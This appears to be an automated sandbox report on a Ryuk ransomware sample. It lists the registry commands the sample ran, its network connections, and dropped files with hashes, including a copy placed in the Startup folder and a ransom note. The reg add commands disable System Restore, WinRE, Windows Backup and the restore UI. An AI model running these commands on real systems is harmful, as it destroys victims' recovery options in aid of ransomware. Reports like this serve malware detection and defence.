C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 f.7.6.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa udp
N/A 10.127.0.1:445 tcp
FI 65.108.73.119:445 tcp
N/A 10.127.0.1:139 tcp
FI 65.108.73.119:139 tcp
GB 51.132.193.104:443 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp

Files

memory/2920-132-0x0000000000000000-mapping.dmp

memory/3600-133-0x0000000000000000-mapping.dmp

memory/2040-134-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/3040-136-0x0000000000000000-mapping.dmp

memory/2540-137-0x0000000000000000-mapping.dmp

memory/2140-138-0x0000000000000000-mapping.dmp

memory/4208-139-0x0000000000000000-mapping.dmp

memory/4964-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

memory/4896-142-0x0000000000000000-mapping.dmp

memory/3292-143-0x0000000000000000-mapping.dmp

memory/4860-144-0x0000000000000000-mapping.dmp

memory/3708-145-0x0000000000000000-mapping.dmp

memory/2708-146-0x0000000000000000-mapping.dmp

memory/5060-147-0x0000000000000000-mapping.dmp

memory/4392-148-0x0000000000000000-mapping.dmp

memory/3476-149-0x0000000000000000-mapping.dmp

memory/4992-150-0x0000000000000000-mapping.dmp

memory/1984-151-0x0000000000000000-mapping.dmp

memory/1712-152-0x0000000000000000-mapping.dmp

memory/1828-153-0x0000000000000000-mapping.dmp

memory/2084-154-0x0000000000000000-mapping.dmp

memory/4240-155-0x0000000000000000-mapping.dmp

memory/3060-156-0x0000000000000000-mapping.dmp

memory/3752-157-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 d32a13d2a39fd672ab06cda60eace717
SHA1 ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA256 18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512 e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

memory/4244-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 d32a13d2a39fd672ab06cda60eace717
SHA1 ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA256 18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512 e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

memory/4088-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 38eb014bc309be66dd2eb004f8fb6fb0
SHA1 ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256 d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA512 67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

C:\ProgramData\hrmlog2

MD5 38eb014bc309be66dd2eb004f8fb6fb0
SHA1 ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256 d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA512 67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

memory/3148-164-0x0000000000000000-mapping.dmp

memory/3940-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 3d1b99acb27c0126675e74e0d860c057
SHA1 ec8fcf47774cb63cc44d042a12c961cce03933a4
SHA256 4ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53
SHA512 6df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854

C:\ProgramData\hrmlog2

MD5 38eb014bc309be66dd2eb004f8fb6fb0
SHA1 ad3c9ba4a5b75a7c8cbc6645c1595004ba3b37fe
SHA256 d50632c488d04a8f55dbca1312c6d266a050e8fe0994e7a6cb8cc4e6b636c582
SHA512 67a28dc58c1046dcc176919bb7e014beda652ba89806832ff951b0a69aec66b2f703ea015567312520f77141068fcd5a16a35d2007118cd33f0421403d081d03

memory/2056-169-0x0000000000000000-mapping.dmp

C:\ProgramData\RYUKID

MD5 3d1b99acb27c0126675e74e0d860c057
SHA1 ec8fcf47774cb63cc44d042a12c961cce03933a4
SHA256 4ed2c30286b41cdccfb75b2d3c6f269beb0293059620281668c844f1a8dafb53
SHA512 6df19ab4a6489d167c196a02414779458825e7ffdec14bf6e2b65017e384e1b51cea6fdc1e73e1d59cb963aa9852ee4e245fb0d3bf9edc7ed95b432e632d5854

C:\ProgramData\hrmlog1

MD5 d32a13d2a39fd672ab06cda60eace717
SHA1 ff8b3b93b6b8ac4f795e1a15540a37ee1a735c4e
SHA256 18afefd504f2c1f816eeba9df00671009f9fc8f44915ae62c7dad214684af437
SHA512 e89652d2d62092d0c4368a456c8f3ef37561f9f3128e2d9128230a098be75c79123f571ed621d3cae80134da1c37acaa6d0f1680de9bf97f87448c887b4161d7

memory/2008-171-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc

memory/3592-173-0x0000000000000000-mapping.dmp

memory/3540-174-0x0000000000000000-mapping.dmp

memory/3460-175-0x0000000000000000-mapping.dmp

memory/3544-176-0x0000000000000000-mapping.dmp

memory/4908-177-0x0000000000000000-mapping.dmp

memory/4052-178-0x0000000000000000-mapping.dmp

memory/4168-179-0x0000000000000000-mapping.dmp

memory/4360-180-0x0000000000000000-mapping.dmp

memory/4476-181-0x0000000000000000-mapping.dmp

memory/1084-182-0x0000000000000000-mapping.dmp

memory/3484-183-0x0000000000000000-mapping.dmp

memory/1776-184-0x0000000000000000-mapping.dmp

memory/116-185-0x0000000000000000-mapping.dmp

memory/4340-186-0x0000000000000000-mapping.dmp

memory/3060-187-0x0000000000000000-mapping.dmp

memory/3392-188-0x0000000000000000-mapping.dmp

memory/2152-189-0x0000000000000000-mapping.dmp

memory/1048-190-0x0000000000000000-mapping.dmp

memory/1796-192-0x0000000000000000-mapping.dmp

memory/3912-191-0x0000000000000000-mapping.dmp

memory/3696-194-0x0000000000000000-mapping.dmp

memory/5008-193-0x0000000000000000-mapping.dmp

memory/4808-195-0x0000000000000000-mapping.dmp

memory/4276-196-0x0000000000000000-mapping.dmp

memory/4408-197-0x0000000000000000-mapping.dmp

memory/3784-198-0x0000000000000000-mapping.dmp

memory/1428-199-0x0000000000000000-mapping.dmp

memory/1240-201-0x0000000000000000-mapping.dmp

memory/1424-200-0x0000000000000000-mapping.dmp

memory/2896-202-0x0000000000000000-mapping.dmp

memory/1976-203-0x0000000000000000-mapping.dmp

memory/2376-204-0x0000000000000000-mapping.dmp

memory/4952-205-0x0000000000000000-mapping.dmp

memory/2212-206-0x0000000000000000-mapping.dmp